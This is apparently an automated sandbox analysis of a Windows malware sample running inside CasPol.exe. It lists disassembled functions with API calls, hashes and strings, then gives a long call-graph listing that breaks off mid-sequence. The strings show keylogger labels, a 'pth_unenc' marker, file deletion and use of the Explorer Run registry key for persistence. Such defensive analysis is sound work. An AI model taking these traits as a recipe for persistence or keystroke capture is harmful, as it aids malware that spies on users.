                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Alloc
                                                                                                                  • String ID: FlsAlloc$h(RA/
                                                                                                                  • API String ID: 2773662609-133170321
                                                                                                                  • Opcode ID: a4c1784f5932adb522d2ca488d7768f2f935f19ba84bde8ccc2372c69ff9f61f
                                                                                                                  • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                                                                                                                  • Opcode Fuzzy Hash: a4c1784f5932adb522d2ca488d7768f2f935f19ba84bde8ccc2372c69ff9f61f
                                                                                                                  • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free
                                                                                                                  • String ID: FlsFree$h(RA/
                                                                                                                  • API String ID: 3978063606-696387864
                                                                                                                  • Opcode ID: 266330d642cf3eee4d4242d0d615bdc8a312c100e9c677cf1b977f31c441131a
                                                                                                                  • Instruction ID: b54f93d543b27d774a413c601eeb0e62583d490719bbc6bc30dd5d2f1f1d8414
                                                                                                                  • Opcode Fuzzy Hash: 266330d642cf3eee4d4242d0d615bdc8a312c100e9c677cf1b977f31c441131a
                                                                                                                  • Instruction Fuzzy Hash: B8E0E571A00128ABF321EB648C15EEFBBA0CB09BC1B00416AFE0667209CE325D0096E6
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00448835
                                                                                                                    • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                    • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFreeHeapLast_free
                                                                                                                  • String ID: `@$`@
                                                                                                                  • API String ID: 1353095263-20545824
                                                                                                                  • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                  • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                                                                                                  • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                  • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                                                                                                  APIs
                                                                                                                  • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: State
                                                                                                                  • String ID: [CtrlL]$[CtrlR]
                                                                                                                  • API String ID: 1649606143-2446555240
                                                                                                                  • Opcode ID: 8b954ca590bdb4d290c694a5b82ac8cddf9bd556695a62cd8e1f2d6ba09f11ff
                                                                                                                  • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                  • Opcode Fuzzy Hash: 8b954ca590bdb4d290c694a5b82ac8cddf9bd556695a62cd8e1f2d6ba09f11ff
                                                                                                                  • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteOpenValue
                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                  • API String ID: 2654517830-1051519024
                                                                                                                  • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                  • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                  • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                  • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                  APIs
                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteDirectoryFileRemove
                                                                                                                  • String ID: pth_unenc
                                                                                                                  • API String ID: 3325800564-4028850238
                                                                                                                  • Opcode ID: 61d114f186a888d4709b2c681f6d3031ab31f41b35aa7972edbcea0596dbeef1
                                                                                                                  • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                  • Opcode Fuzzy Hash: 61d114f186a888d4709b2c681f6d3031ab31f41b35aa7972edbcea0596dbeef1
                                                                                                                  • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                  APIs
                                                                                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectProcessSingleTerminateWait
                                                                                                                  • String ID: pth_unenc
                                                                                                                  • API String ID: 1872346434-4028850238
                                                                                                                  • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                  • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                  • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                  • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CountInfoInputLastTick
                                                                                                                  • String ID: >G
                                                                                                                  • API String ID: 3478931382-1296849874
                                                                                                                  • Opcode ID: 7652f6734eefa1e2a9b5027fbe87b83264b541b1d7de72649e3f314060a3f59a
                                                                                                                  • Instruction ID: 569d6daaa5662565be238ffc564c13078da4f80c5dbfbbb46f8e554dd6e43052
                                                                                                                  • Opcode Fuzzy Hash: 7652f6734eefa1e2a9b5027fbe87b83264b541b1d7de72649e3f314060a3f59a
                                                                                                                  • Instruction Fuzzy Hash: C7D0127040020DBFCB00DFF5EC4D98D7FBCEB00359F104165A005A2111DB70E6448B14
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                                  • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1717984340-0
                                                                                                                  • Opcode ID: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                  • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                                  • Opcode Fuzzy Hash: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                  • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:6.2%
                                                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                  Signature Coverage:0.8%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:64
                                                                                                                  execution_graph 40501 441819 40504 430737 40501->40504 40503 441825 40505 430756 40504->40505 40506 43076d 40504->40506 40507 430774 40505->40507 40508 43075f 40505->40508 40506->40503 40510 43034a memcpy 40507->40510 40525 4169a7 11 API calls 40508->40525 40513 43077e 40510->40513 40511 4307ce 40512 430819 memset 40511->40512 40518 415b2c 40511->40518 40512->40506 40513->40506 40513->40511 40516 4307fa 40513->40516 40515 4307e9 40515->40506 40515->40512 40526 4169a7 11 API calls 40516->40526 40519 415b42 40518->40519 40521 415b46 40518->40521 40520 415b94 40519->40520 40519->40521 40523 415b5a 40519->40523 40522 4438b5 10 API calls 40520->40522 40521->40515 40522->40521 40523->40521 40524 415b79 memcpy 40523->40524 40524->40521 40525->40506 40526->40506 37540 442ec6 19 API calls 37717 4152c6 malloc 37718 4152e2 37717->37718 37719 4152ef 37717->37719 37721 416760 11 API calls 37719->37721 37721->37718 38298 4466f4 38317 446904 38298->38317 38300 446700 GetModuleHandleA 38303 446710 __set_app_type __p__fmode __p__commode 38300->38303 38302 4467a4 38304 4467ac __setusermatherr 38302->38304 38305 4467b8 38302->38305 38303->38302 38304->38305 38318 4468f0 _controlfp 38305->38318 38307 4467bd _initterm __wgetmainargs _initterm 38308 446810 38307->38308 38309 44681e GetStartupInfoW 38307->38309 38311 446866 GetModuleHandleA 38309->38311 38319 41276d 38311->38319 38315 446896 exit 38316 44689d _cexit 38315->38316 38316->38308 38317->38300 38318->38307 38320 41277d 38319->38320 38362 4044a4 LoadLibraryW 38320->38362 38322 412785 38323 412789 38322->38323 38370 414b81 38322->38370 38323->38315 38323->38316 38326 4127c8 38376 412465 memset ??2@YAPAXI 38326->38376 38328 4127ea 38388 40ac21 38328->38388 38333 412813 38406 40dd07 memset 38333->38406 38334 412827 38411 40db69 memset 38334->38411 38337 412822 38432 4125b6 ??3@YAXPAX 38337->38432 38339 40ada2 _wcsicmp 38340 41283d 38339->38340 38340->38337 38343 412863 CoInitialize 38340->38343 38416 41268e 38340->38416 38436 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38343->38436 38345 41296f 38438 40b633 38345->38438 38350 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38354 412957 CoUninitialize 38350->38354 38359 4128ca 38350->38359 38354->38337 38355 4128d0 TranslateAcceleratorW 38356 412941 GetMessageW 38355->38356 38355->38359 38356->38354 38356->38355 38357 412909 IsDialogMessageW 38357->38356 38357->38359 38358 4128fd IsDialogMessageW 38358->38356 38358->38357 38359->38355 38359->38357 38359->38358 38360 41292b TranslateMessage DispatchMessageW 38359->38360 38361 41291f IsDialogMessageW 38359->38361 38360->38356 38361->38356 38361->38360 38363 4044f7 38362->38363 38364 4044cf GetProcAddress 38362->38364 38368 404507 MessageBoxW 38363->38368 38369 40451e 38363->38369 38365 4044e8 FreeLibrary 38364->38365 38366 4044df 38364->38366 38365->38363 38367 4044f3 38365->38367 38366->38365 38367->38363 38368->38322 38369->38322 38371 414b8a 38370->38371 38372 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38370->38372 38442 40a804 memset 38371->38442 38372->38326 38375 414b9e GetProcAddress 38375->38372 38377 4124e0 38376->38377 38378 412505 ??2@YAPAXI 38377->38378 38379 41251c 38378->38379 38381 412521 38378->38381 38464 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38379->38464 38453 444722 38381->38453 38387 41259b wcscpy 38387->38328 38469 40b1ab free free 38388->38469 38390 40ac5c 38393 40a9ce malloc memcpy free free 38390->38393 38394 40ad4b 38390->38394 38396 40ace7 free 38390->38396 38401 40ad76 38390->38401 38473 40a8d0 38390->38473 38485 4099f4 38390->38485 38393->38390 38394->38401 38493 40a9ce 38394->38493 38396->38390 38400 40a8d0 7 API calls 38400->38401 38470 40aa04 38401->38470 38402 40ada2 38404 40adc9 38402->38404 38405 40adaa 38402->38405 38403 40adb3 _wcsicmp 38403->38404 38403->38405 38404->38333 38404->38334 38405->38403 38405->38404 38498 40dce0 38406->38498 38408 40dd3a GetModuleHandleW 38503 40dba7 38408->38503 38412 40dce0 3 API calls 38411->38412 38413 40db99 38412->38413 38575 40dae1 38413->38575 38589 402f3a 38416->38589 38418 412766 38418->38337 38418->38343 38419 4126d3 _wcsicmp 38420 4126a8 38419->38420 38420->38418 38420->38419 38422 41270a 38420->38422 38623 4125f8 7 API calls 38420->38623 38422->38418 38592 411ac5 38422->38592 38433 4125da 38432->38433 38434 4125f0 38433->38434 38435 4125e6 DeleteObject 38433->38435 38437 40b1ab free free 38434->38437 38435->38434 38436->38350 38437->38345 38439 40b640 38438->38439 38440 40b639 free 38438->38440 38441 40b1ab free free 38439->38441 38440->38439 38441->38323 38443 40a83b GetSystemDirectoryW 38442->38443 38444 40a84c wcscpy 38442->38444 38443->38444 38449 409719 wcslen 38444->38449 38447 40a881 LoadLibraryW 38448 40a886 38447->38448 38448->38372 38448->38375 38450 409724 38449->38450 38451 409739 wcscat LoadLibraryW 38449->38451 38450->38451 38452 40972c wcscat 38450->38452 38451->38447 38451->38448 38452->38451 38454 444732 38453->38454 38455 444728 DeleteObject 38453->38455 38465 409cc3 38454->38465 38455->38454 38457 412551 38458 4010f9 38457->38458 38459 401130 38458->38459 38460 401134 GetModuleHandleW LoadIconW 38459->38460 38461 401107 wcsncat 38459->38461 38462 40a7be 38460->38462 38461->38459 38463 40a7d2 38462->38463 38463->38387 38463->38463 38464->38381 38468 409bfd memset wcscpy 38465->38468 38467 409cdb CreateFontIndirectW 38467->38457 38468->38467 38469->38390 38471 40aa14 38470->38471 38472 40aa0a free 38470->38472 38471->38402 38472->38471 38474 40a8eb 38473->38474 38475 40a8df wcslen 38473->38475 38476 40a906 free 38474->38476 38477 40a90f 38474->38477 38475->38474 38478 40a919 38476->38478 38479 4099f4 3 API calls 38477->38479 38480 40a932 38478->38480 38481 40a929 free 38478->38481 38479->38478 38482 4099f4 3 API calls 38480->38482 38483 40a93e memcpy 38481->38483 38484 40a93d 38482->38484 38483->38390 38484->38483 38486 409a41 38485->38486 38487 4099fb malloc 38485->38487 38486->38390 38489 409a37 38487->38489 38490 409a1c 38487->38490 38489->38390 38491 409a30 free 38490->38491 38492 409a20 memcpy 38490->38492 38491->38489 38492->38491 38494 40a9e7 38493->38494 38495 40a9dc free 38493->38495 38497 4099f4 3 API calls 38494->38497 38496 40a9f2 38495->38496 38496->38400 38497->38496 38522 409bca GetModuleFileNameW 38498->38522 38500 40dce6 wcsrchr 38501 40dcf5 38500->38501 38502 40dcf9 wcscat 38500->38502 38501->38502 38502->38408 38523 44db70 38503->38523 38507 40dbfd 38526 4447d9 38507->38526 38510 40dc34 wcscpy wcscpy 38552 40d6f5 38510->38552 38511 40dc1f wcscpy 38511->38510 38514 40d6f5 3 API calls 38515 40dc73 38514->38515 38516 40d6f5 3 API calls 38515->38516 38517 40dc89 38516->38517 38518 40d6f5 3 API calls 38517->38518 38519 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38518->38519 38558 40da80 38519->38558 38522->38500 38524 40dbb4 memset memset 38523->38524 38525 409bca GetModuleFileNameW 38524->38525 38525->38507 38528 4447f4 38526->38528 38527 40dc1b 38527->38510 38527->38511 38528->38527 38529 444807 ??2@YAPAXI 38528->38529 38530 44481f 38529->38530 38531 444873 _snwprintf 38530->38531 38532 4448ab wcscpy 38530->38532 38565 44474a 8 API calls 38531->38565 38534 4448bb 38532->38534 38566 44474a 8 API calls 38534->38566 38536 4448a7 38536->38532 38536->38534 38537 4448cd 38567 44474a 8 API calls 38537->38567 38539 4448e2 38568 44474a 8 API calls 38539->38568 38541 4448f7 38569 44474a 8 API calls 38541->38569 38543 44490c 38570 44474a 8 API calls 38543->38570 38545 444921 38571 44474a 8 API calls 38545->38571 38547 444936 38572 44474a 8 API calls 38547->38572 38549 44494b 38573 44474a 8 API calls 38549->38573 38551 444960 ??3@YAXPAX 38551->38527 38553 44db70 38552->38553 38554 40d702 memset GetPrivateProfileStringW 38553->38554 38555 40d752 38554->38555 38556 40d75c WritePrivateProfileStringW 38554->38556 38555->38556 38557 40d758 38555->38557 38556->38557 38557->38514 38559 44db70 38558->38559 38560 40da8d memset 38559->38560 38561 40daac LoadStringW 38560->38561 38562 40dac6 38561->38562 38562->38561 38564 40dade 38562->38564 38574 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38562->38574 38564->38337 38565->38536 38566->38537 38567->38539 38568->38541 38569->38543 38570->38545 38571->38547 38572->38549 38573->38551 38574->38562 38585 409b98 GetFileAttributesW 38575->38585 38577 40daea 38578 40db63 38577->38578 38579 40daef wcscpy wcscpy GetPrivateProfileIntW 38577->38579 38578->38339 38586 40d65d GetPrivateProfileStringW 38579->38586 38581 40db3e 38587 40d65d GetPrivateProfileStringW 38581->38587 38583 40db4f 38588 40d65d GetPrivateProfileStringW 38583->38588 38585->38577 38586->38581 38587->38583 38588->38578 38624 40eaff 38589->38624 38593 411ae2 memset 38592->38593 38594 411b8f 38592->38594 38664 409bca GetModuleFileNameW 38593->38664 38606 411a8b 38594->38606 38596 411b0a wcsrchr 38597 411b22 wcscat 38596->38597 38598 411b1f 38596->38598 38665 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38597->38665 38598->38597 38600 411b67 38666 402afb 38600->38666 38604 411b7f 38722 40ea13 SendMessageW memset SendMessageW 38604->38722 38607 402afb 27 API calls 38606->38607 38608 411ac0 38607->38608 38609 4110dc 38608->38609 38610 41113e 38609->38610 38615 4110f0 38609->38615 38747 40969c LoadCursorW SetCursor 38610->38747 38612 411143 38748 4032b4 38612->38748 38766 444a54 38612->38766 38613 4110f7 _wcsicmp 38613->38615 38614 411157 38616 40ada2 _wcsicmp 38614->38616 38615->38610 38615->38613 38769 410c46 10 API calls 38615->38769 38619 411167 38616->38619 38617 4111af 38619->38617 38620 4111a6 qsort 38619->38620 38620->38617 38623->38420 38625 40eb10 38624->38625 38637 40e8e0 38625->38637 38628 40eb6c memcpy memcpy 38632 40ebb7 38628->38632 38629 40ebf2 ??2@YAPAXI ??2@YAPAXI 38631 40ec2e ??2@YAPAXI 38629->38631 38634 40ec65 38629->38634 38630 40d134 16 API calls 38630->38632 38631->38634 38632->38628 38632->38629 38632->38630 38634->38634 38647 40ea7f 38634->38647 38636 402f49 38636->38420 38638 40e8f2 38637->38638 38639 40e8eb ??3@YAXPAX 38637->38639 38640 40e900 38638->38640 38641 40e8f9 ??3@YAXPAX 38638->38641 38639->38638 38642 40e911 38640->38642 38643 40e90a ??3@YAXPAX 38640->38643 38641->38640 38644 40e931 ??2@YAPAXI ??2@YAPAXI 38642->38644 38645 40e921 ??3@YAXPAX 38642->38645 38646 40e92a ??3@YAXPAX 38642->38646 38643->38642 38644->38628 38645->38646 38646->38644 38648 40aa04 free 38647->38648 38649 40ea88 38648->38649 38650 40aa04 free 38649->38650 38651 40ea90 38650->38651 38652 40aa04 free 38651->38652 38653 40ea98 38652->38653 38654 40aa04 free 38653->38654 38655 40eaa0 38654->38655 38656 40a9ce 4 API calls 38655->38656 38657 40eab3 38656->38657 38658 40a9ce 4 API calls 38657->38658 38659 40eabd 38658->38659 38660 40a9ce 4 API calls 38659->38660 38661 40eac7 38660->38661 38662 40a9ce 4 API calls 38661->38662 38663 40ead1 38662->38663 38663->38636 38664->38596 38665->38600 38723 40b2cc 38666->38723 38668 402b0a 38669 40b2cc 27 API calls 38668->38669 38670 402b23 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402b3a 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402b54 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402b6b 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402b82 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402b99 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402bb0 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402bc7 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402bde 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402bf5 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402c0c 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402c23 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 402c3a 38693->38694 38695 40b2cc 27 API calls 38694->38695 38696 402c51 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402c68 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 402c7f 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402c99 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402cb3 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402cd5 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402cf0 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402d0b 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402d26 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 402d3e 38713->38714 38715 40b2cc 27 API calls 38714->38715 38716 402d59 38715->38716 38717 40b2cc 27 API calls 38716->38717 38718 402d78 38717->38718 38719 40b2cc 27 API calls 38718->38719 38720 402d93 38719->38720 38721 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38720->38721 38721->38604 38722->38594 38726 40b58d 38723->38726 38725 40b2d1 38725->38668 38727 40b5a4 GetModuleHandleW FindResourceW 38726->38727 38728 40b62e 38726->38728 38729 40b5c2 LoadResource 38727->38729 38731 40b5e7 38727->38731 38728->38725 38730 40b5d0 SizeofResource LockResource 38729->38730 38729->38731 38730->38731 38731->38728 38739 40afcf 38731->38739 38733 40b608 memcpy 38742 40b4d3 memcpy 38733->38742 38735 40b61e 38743 40b3c1 18 API calls 38735->38743 38737 40b626 38744 40b04b 38737->38744 38740 40b04b ??3@YAXPAX 38739->38740 38741 40afd7 ??2@YAPAXI 38740->38741 38741->38733 38742->38735 38743->38737 38745 40b051 ??3@YAXPAX 38744->38745 38746 40b05f 38744->38746 38745->38746 38746->38728 38747->38612 38749 4032c4 38748->38749 38750 40b633 free 38749->38750 38751 403316 38750->38751 38770 44553b 38751->38770 38755 403480 38968 40368c 15 API calls 38755->38968 38757 403489 38758 40b633 free 38757->38758 38759 403495 38758->38759 38759->38614 38760 4033a9 memset memcpy 38761 4033ec wcscmp 38760->38761 38762 40333c 38760->38762 38761->38762 38762->38755 38762->38760 38762->38761 38966 4028e7 11 API calls 38762->38966 38967 40f508 6 API calls 38762->38967 38764 403421 _wcsicmp 38764->38762 38767 444a64 FreeLibrary 38766->38767 38768 444a83 38766->38768 38767->38768 38768->38614 38769->38615 38771 445548 38770->38771 38772 445599 38771->38772 38969 40c768 38771->38969 38773 4455a8 memset 38772->38773 38916 4457f2 38772->38916 39052 403988 38773->39052 38780 445854 38781 4458aa 38780->38781 39177 403c9c memset memset memset memset memset 38780->39177 38783 44594a 38781->38783 38784 4458bb memset memset 38781->38784 38782 445672 39063 403fbe memset memset memset memset memset 38782->39063 38786 4459ed 38783->38786 38787 44595e memset memset 38783->38787 38789 414c2e 16 API calls 38784->38789 38792 445a00 memset memset 38786->38792 38793 445b22 38786->38793 38794 414c2e 16 API calls 38787->38794 38788 4455e5 38788->38782 38806 44560f 38788->38806 38795 4458f9 38789->38795 39200 414c2e 38792->39200 38798 445bca 38793->38798 38799 445b38 memset memset memset 38793->38799 38804 44599c 38794->38804 38805 40b2cc 27 API calls 38795->38805 38816 445c8b memset memset 38798->38816 38866 445cf0 38798->38866 38811 445bd4 38799->38811 38812 445b98 38799->38812 38800 445849 39265 40b1ab free free 38800->39265 38815 40b2cc 27 API calls 38804->38815 38817 445909 38805->38817 38808 4087b3 338 API calls 38806->38808 38827 445621 38808->38827 38810 44589f 39266 40b1ab free free 38810->39266 38824 414c2e 16 API calls 38811->38824 38812->38811 38820 445ba2 38812->38820 38829 4459ac 38815->38829 38818 414c2e 16 API calls 38816->38818 38826 409d1f 6 API calls 38817->38826 38830 445cc9 38818->38830 39338 4099c6 wcslen 38820->39338 38821 4456b2 39253 40b1ab free free 38821->39253 38823 40b2cc 27 API calls 38833 445a4f 38823->38833 38835 445be2 38824->38835 38825 403335 38965 4452e5 45 API calls 38825->38965 38838 445919 38826->38838 39251 4454bf 20 API calls 38827->39251 38828 445823 38828->38800 38846 4087b3 338 API calls 38828->38846 38839 